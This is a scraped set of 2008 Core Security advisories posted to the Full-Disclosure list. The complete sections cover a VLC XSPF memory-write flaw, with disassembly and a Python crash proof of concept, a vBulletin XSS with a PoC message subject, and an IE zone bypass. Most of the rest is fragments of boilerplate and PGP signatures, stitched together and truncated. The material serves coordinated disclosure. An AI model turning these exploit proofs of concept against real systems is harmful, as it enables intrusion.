70246985 . 8B2B MOV EBP,DWORD PTR DS:[EBX] ;
EBP = pp_tracklist = 0
70246987 . 8B7C24 44 MOV EDI,DWORD PTR SS:[ESP+44];
EDI = p_new_input
7024698B . 897C95 00 MOV DWORD PTR SS:[EBP+EDX*4],EDI ;
Saves p_new_input in pp_tracklist[i_identifier]
- ---/
At this point, when parsing the first track of the playlist,
'i_tracklist_entries' value is 0. The parser performs a signed
comparison between 'i_identifier' and 'i_tracklist_entries', so by
providing a negative value for 'i_identifier', an attacker can avoid
that conditional JGE jump to be executed. After that, EBP is always 0
and the attacker controls EDX, so he can write 'p_new_input' to almost
any memory address aligned to a 4-byte boundary. 'p_new_input' is a
pointer to a structure of type 'input_item_t', that holds information
about the playlist item being processed. At 'p_new_input + 0x10' there
is a pointer to the track filename (provided by the 'location'
attribute), excluding the path.
This track filename (which is UTF-8 encoded) is controlled by the user
too, so if an attacker overwrites a specially chosen memory address and
the program executes some instructions that load 'p_new_input' into a
CPU register and perform an indirect call like 'CALL DWORD[R32 + 0x10]'
(where R32 is a 32-bit register), it will be possible to get arbitrary
code execution with the privileges of the current user.
The following Python code will generate an XSPF file that, when opened
with VLC media player 0.9.2, will crash the application when trying to
write 'p_new_input' to memory address 41424344.
/---
xspf_file_content = '''
http://xspf.org/ns/0/";>
XSPF PoC
C:\My%20Music\playlist.xspf
-1873768239
C:\My%20Music\Track1.mp3
http://www.videolan.org/vlc/playlist/0";>
239099
http://www.videolan.org/vlc/playlist/0";>
'''
crafted_xspf_file = open('playlist.xspf','w')
crafted_xspf_file.write(xspf_file_content)
crafted_xspf_file.close()
- ---/
9. *Report Timeline*
2008-10-10: Core Security Technologies notifies the VLC team of the
vulnerability, and that the advisory CORE-2008-1010 will be published on
October 14th, since the vulnerability is already fixed in VLC versions
0.9.3 and 0.9.4.
2008-10-12: VLC team confirms that the vulnerability has been fixed (the
vulnerability was discovered and fixed by the VLC team on September 15th).
2008-10-14: Advisory CORE-2008-1010 is published.
10. *References*
[1] XSPF format http://www.xspf.org/
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkj1DEkACgkQyNibggitWa2M+ACghrS9hKB5saDl3ufp69iJ46P5
DHoAn2Ygu5INc0u2P+tW+m+JZATCFXp0
=LilF
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0126: iPhone Safari JavaScript alert Denial of Service
t enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIyuMAyNibggitWa0RArBaAJ9NOuyo5DwXda571Ltra2BM4uZw+ACfYtCU 5pu4hSqtL8R+7syRM5nhnDQ= =i+Yt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0813 - vBulletin Cross Site Scripting Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
vBulletin Cross Site Scripting Vulnerability
*Advisory Information*
Title: vBulletin Cross Site Scripting Vulnerability
Advisory ID: CORE-2008-0813
Advisory URL: http://www.coresecurity.com/my-advisory
Date published: 2008-08-20
Date of last update: 2008-08-19
Vendors contacted: vBulletin team
Release mode: Coordinated release
*Vulnerability Information*
Class: XSS flaw
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: N/A
*Vulnerability Description*
vBulletin [1] is a community forum solution for a wide range of users,
including industry leading companies. A XSS vulnerability has been
discovered that could allow an attacker to carry out an action
impersonating a legal user, or to obtain access to a user's account.
This flaw allows unauthorized disclosure and modification of
information, and it allows disruption of service.
*Vulnerable Packages*
. vBulletin 3.7.2 Patch Level 1.
. vBulletin 3.6.10 Patch Level 3.
. Older versions are probably affected too, but they were not checked.
*Non-vulnerable Packages*
. vBulletin 3.7.2 Patch Level 2.
. vBulletin 3.6.10 Patch Level 4.
*Vendor Information, Solutions and Workarounds*
vBulletin team has released patches for this flaw (see [2]), and new
fixed versions of vBulletin (3.6.11 and 3.7.3) will be available on
Tuesday, August 26th. Refer to [3] for more details.
*Credits*
This vulnerability was discovered and researched by Federico Muttis from
Core Security Technologies.
*Technical Description / Proof of Concept Code*
This is a Cross Site Scripting (XSS) vulnerability within vBulletin
community forum solution. In order to exploit this flaw the following
option needs to be activated:
'http://victim/vBulletin/profile.php?do=editoptions' (Show New Private
Message Notification Pop-Up enabled). There are many forums with this
option enabled by default for all new users.
The title is not being encoded in the following rendered HTML code:
/---
- ---/
The variable '$newpm[title]' in 'install/vbulletin-style.xml' was
previously de-sanitized in 'global.php' and only slash-escaping survives:
/---
//
#
// get new private message popup
$shownewpm = false;
if ($vbulletin->userinfo['pmpopup'] == 2 AND
$vbulletin->options['checknewpm'] AND $vbulletin->userinfo['userid'] AND
!defined('NOPMPOPUP'))
{
$userdm =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
$userdm->set_existing($vbulletin->userinfo);
$userdm->set('pmpopup', 1);
$userdm->save(true, 'pmpopup'); // 'pmpopup' tells db_update to issue a
shutdownquery of the same name
unset($userdm);
if (THIS_SCRIPT != 'private' AND THIS_SCRIPT != 'login')
{
$newpm = $db->query_first("
SELECT pm.pmid, title, fromusername
FROM " . TABLE_PREFIX . "pmtext AS pmtext
LEFT JOIN " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
WHERE pm.userid = " . $vbulletin->userinfo['userid'] . "
AND pm.folderid = 0
ORDER BY dateline DESC
LIMIT 1");
$newpm['username'] =
addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
$newpm['title'] =
addslashes_js(unhtmlspecialchars($newpm['title'],
true), '"');
$shownewpm = true;
}
}
- ---/
Which of course allows XSS attacks.
The 'alert' Proof of Concept (PoC) exploit would be to write a PM to the
user you want to attack with this subject:
/---
- -->alert(/xss/.source)
[Full-disclosure] CORE-2008-0103: Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
~ Core Security Technologies - CoreLabs Advisory
~ http://www.coresecurity.com/corelabs/
Internet Explorer Zone Elevation Restrictions Bypass and Security Zone
Restrictions Bypass
*Advisory Information*
Title: Internet Explorer Zone Elevation Restrictions Bypass and Security
Zone Restrictions Bypass
Advisory ID: CORE-2008-0103
Advisory URL:
http://www.coresecurity.com/content/internet-explorer-zone-elevation
Date published: 2008-08-13
Date of last update: 2008-08-13
Vendors contacted: Microsoft
Release mode: Coordinated release
*Vulnerability Information*
Class: Zone Elevation Restrictions Bypass and Security Zone Restrictions
Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 30585
CVE Name: CVE-2008-1448
*Vulnerability Description*
Internet Explorer introduces the concept of URL Security Zones, which
basically define a set of privileges for web applications (such as, for
example, accessing and/or modifying the local computer files) depending
on their level of trustworthiness.
Issues have been found in the way that security policies are applied
when a URI is specified in the UNC form:
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'
* When a remote site attempts to access a local resource, Internet
Explorer will fail to enforce the Zone Elevation restrictions.
* When browsing a remote site, Internet Explorer will not apply the
right Security Zone permissions, allowing a site belonging to a less
secure zone to be treated as one belonging to a more privileged zone.
*Vulnerable Packages*
. Internet Explorer 5 under Windows 2000/2003/XP
. Internet Explorer 6 under Windows 2000/2003/XP
. Internet Explorer 7 under Windows 2000/2003/XP
. Internet Explorer 7 under Windows Vista (when protected mode is turned
off)
*Non-vulnerable Packages*
. This vulnerability is addressed by Microsoft Security Bulletin
MS08-048 [1]
*Vendor Information, Solutions and Workarounds*
Microsoft has issued Security Bulletin MS08-048 to address this
vulnerability. The bulletin includes workarounds and mitigating factors.
For more information refer to the bulletin:
http://www.microsoft.com/technet/security/bulletin/ms08-048.mspx
Workarounds communicated by the vendor include:
* Locking down the MHTML protocol handler. Below are the required
registry changes.
/---
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN]
"explorer.exe"=dword:0001
"iexplore.exe"=dword:0001
"*"=dword:0001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\1]
"mhtml"="mhtml"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\2]
"mhtml"="mhtml"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\3]
"mhtml"="mhtml"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\4]
"mhtml"="mhtml"
- ---/
* Disabling the MHTML protocol handler. To disable the protocol handler,
follow these steps:
1. Click Start and then click Run. Enter regedit.exe in the text box and
click OK.
2. Navigate to
HKEY_CLASSES_ROOT\CLSID\{05300401-BCBC-11d0-85E3-00C04FD85AB4}.
3. Right click {05300401-BCBC-11d0-85E3-00C04FD85AB4} and select
Permissions.
4. Click Advanced.
5. Deselect Allow inheritable permissions from the parent to propagate
6. Click Remove, and then click OK. Click Yes and OK on subsequent screens.
*Credits*
This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Technologies.
*Technical Description / Proof of Concept Code*
Internet Explorer is the most popular Internet browser in the world as
it is an integrated component of every Windows installation. It
introduces the concept of URL Security Zones, as explained in [2], which
basically define a set of privileges for web applications (such as
accessing and modifying the local computer files) depending on their
level of trustworthiness, namely:
* Local Intranet Zone: for content located on an organization's
intranet. Because the servers and information are within an
organization's firewall, it is reasonable to assign a higher level of
trust to content on the intranet.
* Trusted Sites Zone: for content located on Web sites that are
considered more reputable or trustworthy than other sites on the
Internet. Assigning a higher level of trust to these sites minimizes the
number of related authentication requests. The user adds the URLs of
trusted Web sites to this zone.
* Internet Zone: for Web sites on the Internet that do not belong to
another zone. This default setting causes Internet Explorer to prompt
the user whenever potentially unsafe content is about to be downloaded.
Web sites that are not mapped into
[Full-disclosure] CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability
itrary code execution by an unprivileged user. . 2008-08-04: CORE-2008-0716 advisory is published. *References* [1] Sun Welcomes Innotek - http://www.sun.com/software/innotek/. [2] http://www.sun.com/aboutsun/pr/2008-05/sunflash.20080529.1.xml. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ md6p6ZKbhrc7SfaD6EsxjoA= =kQyV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0125: CitectSCADA ODBC service vulnerability
mation security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkhP2lEACgkQyNibggitWa29yQCdHfYtgLzOvys9Msi95eqF8H/X ADEAoKB9r52U9KXlEvBn5GgCaqXqC8OG =5qtX -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow
urces are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIRu4lyNibggitWa0RAljKAJ4iVfRGNB6Hz+tA6DKFqpovws/cwACfSBFF a9ffEcKqAre7M1jXT9OpHOg= =UCFz -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0126: Multiple vulnerabilities in iCal
l solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8 PZO21gkXaFO1pAdxuViw2ys= =xZCy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0129 - Wonderware SuiteLink Denial of Service vulnerability
us.wonderware.com/ [2] Tech Alert 106 http://www.wonderware.com/support/mmi/comprehensive/kbcd/html/t002260.htm [3] WonderWare Security Manual - Securing Industrial Control Systems http://www.wonderware.com/support/mmi/esupport/securitycentral/documents/BestPractices/WWSecGd041707_External.pdf *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIH2eAyNibggitWa0RAtlcAKCgV83vS0v4aLVTRtFmkBsEg0UPXgCdHL4p si+I8mGJwJuglh+QESsZ9ZE= =705O -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
